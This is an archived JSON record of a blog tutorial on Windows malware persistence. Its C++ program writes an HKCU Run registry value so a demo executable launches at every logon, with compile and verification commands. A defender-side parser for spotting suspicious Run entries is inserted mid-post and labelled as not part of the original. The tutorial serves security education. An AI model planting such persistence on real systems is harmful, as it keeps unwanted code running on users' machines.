{
	"id": "477085b9-b2cd-4322-9d2d-74e1590741a9",
	"created_at": "2026-04-06T00:13:20.327831Z",
	"updated_at": "2026-04-10T03:20:16.319073Z",
	"deleted_at": null,
	"sha1_hash": "f9b285ccb48d71c153b1a6025cde00f1425c86e9",
	"title": "Malware development: persistence - part 1. Registry run keys. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3901511,
	"plain_text": "Malware development: persistence - part 1. Registry run keys. C++\r\nexample.\r\nBy cocomelonc\r\nPublished: 2022-04-20 · Archived: 2026-04-05 19:58:02 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white-hat hackers!\r\nThis post starts a series of articles on Windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of my own research into the “classic” persistence trick: the registry run keys.\r\nrun keysPermalink\r\nAdding an entry to the “run keys” in the registry causes the referenced program to be executed when a user logs in.\r\nThese programs run in the context of that user and inherit the account’s permission level: an entry under HKEY_CURRENT_USER fires only for the user whose hive it lives in, while an entry under HKEY_LOCAL_MACHINE fires for every user who logs on (and writing it requires administrative rights).\r\nThe following run keys exist by default on Windows systems:\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\nPage 1 of 15\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\nValues under the Run keys execute at every logon; values under RunOnce are deleted before the command runs, so they fire a single time.\r\nThreat actors use these configuration locations to execute malware and maintain persistence through system\r\nreboots. They may also use masquerading to make the registry entries look as if they belong to\r\nlegitimate programs.\r\npractical examplePermalink\r\nLet’s look at a practical example. 
Let’s say we have a “malware” hack.cpp :\r\n/*\r\nmeow-meow messagebox\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n  // the whole payload: pop a message box so we can see it run at logon\r\n  MessageBoxA(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n  return 0;\r\n}\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -mwindows -I/usr/share/mingw-w64/include/ -s -ffunction-sections\r\nAnd save it to the folder Z:\\\\2022-04-20-malware-pers-1\\ :\r\nThen, let’s create a program pers.cpp that adds a registry value which will execute our hack.exe when we\r\nlog into Windows:\r\n/*\r\npers.cpp\r\nwindows low level persistence via the Run registry key\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n  HKEY hkey = NULL;\r\n  // malicious app: an absolute path, because the logon shell will not resolve it relative to our cwd\r\n  const char* exe = \"Z:\\\\2022-04-20-malware-pers-1\\\\hack.exe\";\r\n  // open the per-user Run key for writing (the access mask is cut off in the archived copy; KEY_WRITE is assumed here)\r\n  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_WRITE, \u0026hkey);\r\n  if (res == ERROR_SUCCESS) {\r\n    // set a new value named \"hack\" under the Run key; for REG_SZ the size must include the terminating null\r\n    RegSetValueEx(hkey, (LPCSTR)\"hack\", 0, REG_SZ, (const BYTE*)exe, strlen(exe) + 1);\r\n    RegCloseKey(hkey);\r\n  }\r\n  return 0;\r\n}\r\nAs you can see, the logic is the simplest possible: we just add a new value under the Run key. 
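The writer’s side is shown above; the defender’s side is the check a blue team runs over the same keys. What follows is an added example, not code from the original post: an offline triage parser, in the page’s own language, for the text that `reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s` prints, which flags any Run entry whose executable sits outside the standard install directories. The sample output embedded in `kSample` is constructed for the example and includes the `hack` value that pers.cpp writes; the other entry names and the trusted-prefix list in `isSuspicious` are assumptions for the demonstration, not a product heuristic.

```cpp
// Added example: offline triage of `reg query ... /s` output. Parses Run
// values and flags image paths outside the standard install locations.
#include <algorithm>
#include <cctype>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

struct RunEntry {
    std::string key;   // registry key the value lives under
    std::string name;  // value name, e.g. "hack"
    std::string type;  // REG_SZ or REG_EXPAND_SZ
    std::string data;  // command line exactly as stored
};

static std::string trim(const std::string& s) {
    size_t b = s.find_first_not_of(" \t\r\n");
    if (b == std::string::npos) return "";
    size_t e = s.find_last_not_of(" \t\r\n");
    return s.substr(b, e - b + 1);
}

static std::string lower(std::string s) {
    for (char& c : s) c = (char)std::tolower((unsigned char)c);
    return s;
}

// reg query prints each key unindented and each value indented by four
// spaces as "<name>    <type>    <data>", with four spaces between fields.
std::vector<RunEntry> parseRegQuery(const std::string& text) {
    std::vector<RunEntry> out;
    std::istringstream in(text);
    std::string line, currentKey;
    while (std::getline(in, line)) {
        if (trim(line).empty()) continue;
        if (line.rfind("    ", 0) != 0) { currentKey = trim(line); continue; }
        std::string body = trim(line);
        size_t p1 = body.find("    ");
        if (p1 == std::string::npos) continue;
        size_t p2 = body.find("    ", p1 + 4);
        if (p2 == std::string::npos) continue;
        RunEntry e{currentKey, body.substr(0, p1),
                   trim(body.substr(p1 + 4, p2 - p1 - 4)), trim(body.substr(p2 + 4))};
        out.push_back(e);
    }
    return out;
}

// Extract the executable from a stored command line: the quoted token if the
// path is quoted, otherwise the prefix ending at the first ".exe".
std::string imagePath(const std::string& data) {
    std::string d = trim(data);
    if (!d.empty() && d[0] == '"') {
        size_t q = d.find('"', 1);
        return q == std::string::npos ? d.substr(1) : d.substr(1, q - 1);
    }
    size_t exe = lower(d).find(".exe");
    if (exe != std::string::npos) return d.substr(0, exe + 4);
    size_t sp = d.find(' ');
    return sp == std::string::npos ? d : d.substr(0, sp);
}

// Heuristic, not a verdict: an autorun launching from anywhere other than the
// machine-wide install directories (other drives, AppData, Temp, Users\Public)
// goes on the review list. OneDrive legitimately lives under AppData, so the
// analyst still reads the list; the point is that Z:\...\hack.exe cannot hide.
bool isSuspicious(const std::string& path) {
    std::string p = lower(path);
    if (p.empty()) return true;
    const char* trusted[] = { "c:\\windows\\", "%systemroot%\\", "%windir%\\",
        "c:\\program files\\", "c:\\program files (x86)\\", "%programfiles%\\" };
    for (const char* t : trusted)
        if (p.rfind(t, 0) == 0) return false;
    return true;
}

std::vector<RunEntry> flaggedEntries(const std::string& regQueryOutput) {
    std::vector<RunEntry> hits;
    for (const RunEntry& e : parseRegQuery(regQueryOutput))
        if (isSuspicious(imagePath(e.data))) hits.push_back(e);
    return hits;
}

// Constructed sample (assumption): what `reg query "HKCU\...\Run" /s` prints
// after pers.exe has run on a box that also has OneDrive and two made-up
// benign autoruns installed.
const char* kSample =
    "\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\n"
    "    OneDrive    REG_SZ    \"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background\r\n"
    "    ExampleUpdater    REG_SZ    \"C:\\Program Files\\Example\\updater.exe\" --quiet\r\n"
    "    HealthTray    REG_EXPAND_SZ    %SystemRoot%\\system32\\healthtray.exe\r\n"
    "    hack    REG_SZ    Z:\\2022-04-20-malware-pers-1\\hack.exe\r\n\r\n";

int main() {
    for (const RunEntry& e : flaggedEntries(kSample))
        std::cout << "[review] " << e.key << "\\" << e.name << " -> " << imagePath(e.data) << "\n";
    return 0;
}
```

Feed it the saved output of `reg query` from each hive and key (HKCU and HKLM, Run and RunOnce) and read the `[review]` lines; on the sample above it reports OneDrive and hack, and a real review then clears OneDrive by its signed image while the Z: drive entry stays on the list.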
Run-key entries can also be added from the terminal\r\nto achieve persistence, but since I love to write code, I wanted to show how to do it with a few\r\nlines of code.\r\ndemoPermalink\r\nLet’s compile our pers.cpp:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections\r\nThen, first of all, check the existing Run entries on the victim’s machine:\r\nreg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nThen run our pers.exe and check again:\r\n.\\pers.exe\r\nreg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nAs you can see, the new value was added as expected.\r\nNow let’s see it in action. Log out and log in again:\r\nPwn! 
Everything works perfectly :)\r\nAfter the experiment, delete the value:\r\nRemove-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"hack\"\r\nreg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nwindows 11Permalink\r\nThis trick also works on Windows 11:\r\nAnd cleanup:\r\nconclusionPermalink\r\nCreating registry values that execute a malicious app during Windows logon is one of the oldest tricks in the\r\nred team playbook. Various threat actors and known tools such as Metasploit and PowerShell Empire provide this\r\ncapability, so mature blue team specialists will be able to detect this activity: the Run and RunOnce keys are a standard place to look, and a new value pointing outside the usual install directories stands out.\r\nRegOpenKeyEx\r\nRegSetValueEx\r\nRegCloseKey\r\nRemove-ItemProperty\r\nreg query\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html"
	],
	"report_names": [
		"malware-pers-1.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434400,
	"ts_updated_at": 1775791216,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f9b285ccb48d71c153b1a6025cde00f1425c86e9.pdf",
		"text": "https://archive.orkl.eu/f9b285ccb48d71c153b1a6025cde00f1425c86e9.txt",
		"img": "https://archive.orkl.eu/f9b285ccb48d71c153b1a6025cde00f1425c86e9.jpg"
	}
}